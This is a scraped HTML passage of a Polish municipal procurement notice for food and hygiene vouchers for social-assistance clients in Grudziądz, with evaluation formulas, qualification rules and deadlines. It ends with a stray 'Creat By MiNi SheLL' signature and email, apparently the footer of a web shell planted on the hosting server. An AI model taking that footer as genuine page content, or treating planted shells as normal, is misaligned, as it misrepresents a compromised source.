<span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest realizacja imiennych talonów obejmujących artykuły żywnościowe pierwszej potrzeby i podstawowe środki czystości (higieniczno-sanitarne) w okolicach osiedli: Kopernika, Kawalerii Polskiej oraz Strzemięcina w Grudziądzu – przewidywana ilość talonów to około 45 talonów średniomiesięcznie dla 45 osób średniomiesięcznie w okresie od dnia 1 stycznia 2022 r. do dnia 31 grudnia 2022 r. na podstawie imiennego talonu wydawanego przez MOPR, zawierającego oznaczenie decyzji przyznającej świadczenie, dane podopiecznego (imię, nazwisko i adres), okres ważności talonu, kwotę i nazwę sklepu oraz dowodu tożsamości (dowód osobisty lub inny dokument ze zdjęciem) i decyzji MOPR. Wykonawca przystępujący do przetargu musi posiadać co najmniej jeden czynny punkt sprzedaży detalicznej artykułów żywnościowych pierwszej potrzeby i podstawowych środków czystości (higieniczno-sanitarnych) położony w Grudziądzu w rejonie miasta obejmującym daną część zamówienia. </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 114792,00 PLN </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15300000-1 - Owoce, warzywa i podobne produkty</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">15400000-2 - Oleje i tłuszcze zwierzęce lub roślinne</p> <p class="mb-0">15500000-3 - Produkty mleczarskie</p> <p class="mb-0">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</p> <p class="mb-0">15800000-6 - Różne produkty spożywcze</p> <p class="mb-0">33700000-7 - Produkty do pielęgnacji ciała</p> <p class="mb-0">39800000-0 - Środki czyszczące i polerujące</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-01-01 do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przy wyborze złożonej oferty będzie się kierować następującymi <br/> kryteriami: <br/> 1) cena brutto oferty – 60 % <br/> Maksymalną liczbę punktów, tj. 60 punktów uzyska oferta z najniższą ceną <br/> wskazaną w formularzu ofertowym. Pozostałe oferty uzyskają <br/> proporcjonalnie mniej punktów. <br/> Punkty zostaną obliczone wg następującego wzoru:<br/> Cena (C) = Cmin/ Cbad x 60 pkt <br/> <br/> gdzie:<br/> C – liczba punktów przyznanych Wykonawcy za cenę zaoferowaną w <br/> ofercie,<br/> Cmin – najniższa cena brutto spośród ofert niepodlegających odrzuceniu i <br/> złożonych przez Wykonawców, którzy nie podlegali wykluczeniu w danym <br/> etapie badania i oceny ofert,<br/> Cbad – cena brutto zaoferowana w badanej ofercie.<br/><br/>2) liczba punktów sprzedaży detalicznej artykułów żywnościowych pierwszej <br/> potrzeby i podstawowych środków czystości (higieniczno-sanitarnych) <br/> położonych w Grudziądzu – 40 % <br/> Maksymalną liczbę punktów, tj. 40 punktów uzyska oferta, w której <br/> Wykonawca zadeklaruje, że posiada największą liczbę punktów sprzedaży <br/> detalicznej artykułów żywnościowych pierwszej potrzeby i podstawowych <br/> środków czystości (higieniczno-sanitarnych) położonych w Grudziądzu w <br/> rejonie miasta obejmującym daną część zamówienia.<br/> Punkty zostaną obliczone wg następującego wzoru:<br/> <br/>Punkty sprzedaży detalicznej (S) = Sbad/Smax x 40 pkt<br/><br/> gdzie:<br/> S – liczba punktów przyznanych Wykonawcy za posiadanie punktów <br/> sprzedaży detalicznej artykułów żywnościowych pierwszej potrzeby i <br/> podstawowych środków czystości (higieniczno-sanitarnych),<br/> Sbad – liczba punktów sprzedaży detalicznej artykułów żywnościowych <br/> pierwszej potrzeby i podstawowych środków czystości (higieniczno- <br/> sanitarnych) zadeklarowana przez Wykonawcę w badanej ofercie,<br/> Smax – największa zaoferowana liczba punktów sprzedaży detalicznej <br/> artykułów żywnościowych pierwszej potrzeby i podstawowych środków <br/> czystości (higieniczno-sanitarnych) spośród ofert niepodlegających <br/> odrzuceniu i złożonych przez Wykonawców, którzy nie podlegali <br/> wykluczeniu w danym etapie badania i oceny ofert.<br/> <br/> 3) Zamawiający wyliczy łączną ocenę punktową badanej oferty na podstawie <br/> poniższego wzoru uwzględniającego kryteria:<br/><br/> P = C + S<br/><br/> gdzie:<br/> P – całkowita liczba punktów badanej oferty,<br/> C – liczba punktów przyznanych Wykonawcy w kryterium cena,<br/> S – liczba punktów przyznanych Wykonawcy w kryterium punkty sprzedaży detalicznej.<br/><br/> Za ofertę najkorzystniejszą uznana zostanie oferta, która uzyska największą <br/> liczbę punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">punkty sprzedaży detalicznej</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają <br/> wykluczeniu i spełniają warunki udziału w postępowaniu w zakresie zdolności technicznej lub zawodowej.<br/>Zamawiający uzna, że warunek zostanie spełniony, jeżeli Wykonawca <br/>oświadczy, że posiada co najmniej jeden czynny punkt sprzedaży detalicznej <br/>artykułów żywnościowych pierwszej potrzeby i podstawowych środków <br/>czystości (higieniczno-sanitarnych) położony w Grudziądzu w rejonie miasta <br/>obejmującym daną część zamówienia. Zamawiający uzna, że warunek jest <br/>spełniony, jeśli Wykonawca złoży oświadczenie. Ocena spełniania warunku <br/>zostanie dokonana wg reguły spełnia/nie spełnia na podstawie złożonego <br/>oświadczenia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, <br/>oświadczenie o spełnianiu warunków udziału w postępowaniu i niepodleganiu <br/>wykluczeniu składa każdy z Wykonawców. Oświadczenie to potwierdza brak <br/>podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu <br/>w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>Oferta musi być podpisana przez osoby upoważnione do reprezentowania Wykonawcy lub Wykonawców wspólnie ubiegających się o udzielenie zamówienia, zgodnie z formą reprezentacji Wykonawcy określoną w rejestrze lub innym dokumencie, właściwym dla danej formy organizacyjnej Wykonawcy albo przez pełnomocnika Wykonawcy. <br/>Jeżeli osoba podpisująca ofertę działa na podstawie pełnomocnictwa, <br/> to pełnomocnictwo to musi w swej treści jednoznacznie wskazywać uprawnienie <br/> do podpisania oferty. Wykonawca, który składa ofertę za pośrednictwem pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy. <br/>W przypadku Wykonawców ubiegających się wspólnie o udzielenie zamówienia, <br/>Wykonawcy zobowiązani są do ustanowienia pełnomocnika. Dokument pełnomocnictwa, z treści którego będzie wynikało umocowanie do reprezentowania w postępowaniu o udzielenie zamówienia tych Wykonawców, należy załączyć do oferty. Pełnomocnictwo powinno zawierać w szczególności wskazanie postępowania o zamówienie publiczne, którego dotyczy, wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby oraz ustanowionego pełnomocnika i zakresu jego umocowania. <br/>Pełnomocnictwo powinno zostać złożone w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza, tj. podpisanej kwalifikowanym podpisem elektronicznym przez osobę posiadającą uprawnienia notariusza. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje, na podstawie art. 455 ust. 1 pkt 1 ustawy Pzp, możliwość dokonania zmian postanowień niniejszej umowy, w zakresie:<br/>a) zmiany punktu sprzedaży – gdy wystąpią szczególnie uzasadnione <br/> okoliczności, których strony umowy nawet przy dołożeniu należytej <br/> staranności nie mogły przewidzieć w chwili jej zawarcia, powodujące, że <br/> wydawanie klientom MOPR artykułów żywnościowych pierwszej potrzeby i <br/> podstawowych środków czystości (higieniczno-sanitarnych) w danym punkcie <br/> sprzedaży jest niemożliwe. W takich okolicznościach Wykonawca <br/> niezwłocznie wskaże Zamawiającemu inny punkt sprzedaży detalicznej <br/> artykułów żywnościowych pierwszej potrzeby i podstawowych środków <br/> czystości (higieniczno-sanitarnych), położony w tym samym rejonie miasta <br/> Grudziądza,<br/>b) zmiany cen – gdy nastąpi niezależny od Wykonawcy wzrost cen artykułów <br/> żywnościowych pierwszej potrzeby i podstawowych środków czystości <br/> (higieniczno-sanitarnych) wynoszący co najmniej 25% w stosunku do cen <br/> wskazanych w ofercie. Okoliczność taką Wykonawca musi udokumentować <br/> przedkładając faktury lub rachunki od producentów lub własnych dostawców,<br/>c) zmiany stawki podatku VAT – zmiana cen jednostkowych artykułów <br/> żywnościowych pierwszej potrzeby i podstawowych środków czystości <br/> (higieniczno-sanitarnych) w trakcie obowiązywania umowy z powodu zmiany <br/> stawki podatku VAT będzie podlegała waloryzacji odpowiednio o kwotę <br/> podatku VAT, wynikającą ze stawki tego podatku obowiązującej w chwili <br/> powstania obowiązku podatkowego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-09 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz z oświadczeniem należy złożyć za pośrednictwem platformy zakupowej https://platformazakupowa.pl/pn/gpp_grudziadz na stronie dotyczącej odpowiedniego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-09 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-07</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com